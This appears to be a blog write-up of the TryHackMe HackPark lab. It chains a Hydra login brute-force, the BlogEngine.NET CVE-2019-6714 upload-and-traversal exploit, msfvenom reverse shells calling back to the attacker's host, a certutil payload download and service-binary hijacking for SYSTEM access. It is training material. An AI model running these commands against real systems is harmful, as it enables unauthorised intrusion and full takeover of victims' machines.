s1gn 1n subscr1b3

Full Compromise of HackPark

Full Compromise of HackPark

The HackPark room on TryHackMe is a well-structured Windows-based lab that walks through multiple real-world attack techniques: from enumeration, authentication bypass, web exploitation, reverse shell access, to privilege escalation. In this post, I’ll walk through my complete process from scanning to full SYSTEM access.

Initial Enumeration with Nmap

I began with a full TCP port scan to gather a surface-level understanding of the target:

nmap -sC -sV -Pn -p- <target-ip>

Relevant results:

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open  ssl/ms-wbt-server?
5985/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 02:8F:B6:D7:CB:2B (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80 immediately stood out as it served a web interface. I accessed it in the browser and found a login panel to BlogEngine.NET.

Web Application Discovery and Login Bruteforce

At this point, I had no access to internal details of the web application, including its version. I focused on brute-forcing the login.

By inspecting the login form at /Account/login.aspx?ReturnURL=/admin, I found the following:

  • Method: POST
  • Username field: ctl00$MainContent$LoginUser$UserName
  • Password field: ctl00$MainContent$LoginUser$Password
  • Submit field: ctl00$MainContent$LoginUser$LoginButton
  • Response text on failure: Login Failed

Additionally, I captured two crucial ASP.NET form tokens: __VIEWSTATE and __EVENTVALIDATION, which are required for each POST.

I generated a new login wordlist and used Hydra for the brute-force:

hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt <target-ip> http-post-form \
"/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=<...>&__EVENTVALIDATION=<...>&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Log+in:F=Login Failed"

After a few attempts (some VIEWSTATE tokens expired), I finally retrieved valid credentials.

Identifying BlogEngine.NET Version and CVE

Upon successful login, I could now access the admin dashboard. Only then did I confirm the CMS version: BlogEngine.NET 3.3.6.0, as seen in the footer and some HTTP headers.

A quick search revealed this version was vulnerable to CVE-2019-6714, a file upload vulnerability that allows remote code execution.

Exploiting CVE-2019-6714 for Initial Shell Access

I prepared a basic .aspx webshell manually and uploaded it through the post editor’s file upload feature. Although BlogEngine stores uploads in App_Data/files/, which is not directly executable, it’s possible to load them through the theme handler:

http://<target-ip>/?theme=../../App_Data/files

By visiting that URL, my shell.aspx was executed.

Beforehand, I had a Netcat listener ready:

nc -nlvp 6666

Once the shell triggered, I had a basic reverse shell connection.

Switching to Meterpreter for Better Control

The initial shell was unstable. I generated a more reliable ASPX Meterpreter payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=4444 -f aspx -o revshell.aspx

I uploaded it via the same post editor, then visited the URL again via theme traversal. On my Metasploit listener:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <my-ip>
set LPORT 4444
exploit -j

This time I got a full Meterpreter session.

Creating a Stable Reverse Shell with msfvenom

For the sake of the lab (which discourages Meterpreter for the PrivEsc phase), I created a more stable raw reverse shell binary:

msfvenom -p windows/shell_reverse_tcp LHOST=<my-ip> LPORT=8888 -f exe -o shell.exe

I hosted it via Python:

python3 -m http.server 8000

Then I used certutil inside the Windows shell to pull the file:

certutil -urlcache -split -f http://<my-ip>:8000/shell.exe C:\Windows\Temp\shell.exe

With a Netcat listener running on 8888:

nc -nlvp 8888

Once executed, this gave me a much more stable shell to proceed with enumeration.

System Enumeration with winPEAS

To prepare for privilege escalation, I downloaded and transferred winPEASx64.exe to the same writable temp folder. Then I ran:

C:\Windows\Temp\winPEASx64.exe

From the output, I gathered valuable data:

  • OS: Windows Server 2012 R2 Build 9600
  • Original install date: 8/3/2019, 10:43:23 AM
  • Unquoted service paths
  • A service called WindowsScheduler running with high privileges
  • Executable: Message.exe in a writable path

Privilege Escalation via Service Hijacking

I replaced the vulnerable Message.exe binary with my own reverse shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=<my-ip> LPORT=9999 -f exe -o privesc.exe

I uploaded the file and overwrote the original. Then I restarted the service:

sc stop WindowsScheduler
sc start WindowsScheduler

Shortly after, I received a new reverse shell as NT AUTHORITY\SYSTEM.

Post-Exploitation: Flag Capture

With SYSTEM access, I moved to the user directories and collected both flags:

  • C:\Users\Jeff\Desktop\user.txt
  • C:\Users\Administrator\Desktop\root.txt

Both were successfully captured.

Final Thoughts

HackPark is an excellent lab that forces you to chain multiple steps:

  • Port and service enumeration
  • ASP.NET form analysis and Hydra brute-force
  • Exploiting BlogEngine.NET’s CVE-2019-6714
  • Shell pivoting and improving access stability
  • Privilege escalation via writable service binaries

Highly recommended for anyone prepping for OSCP or real-world Windows penetration testing scenarios.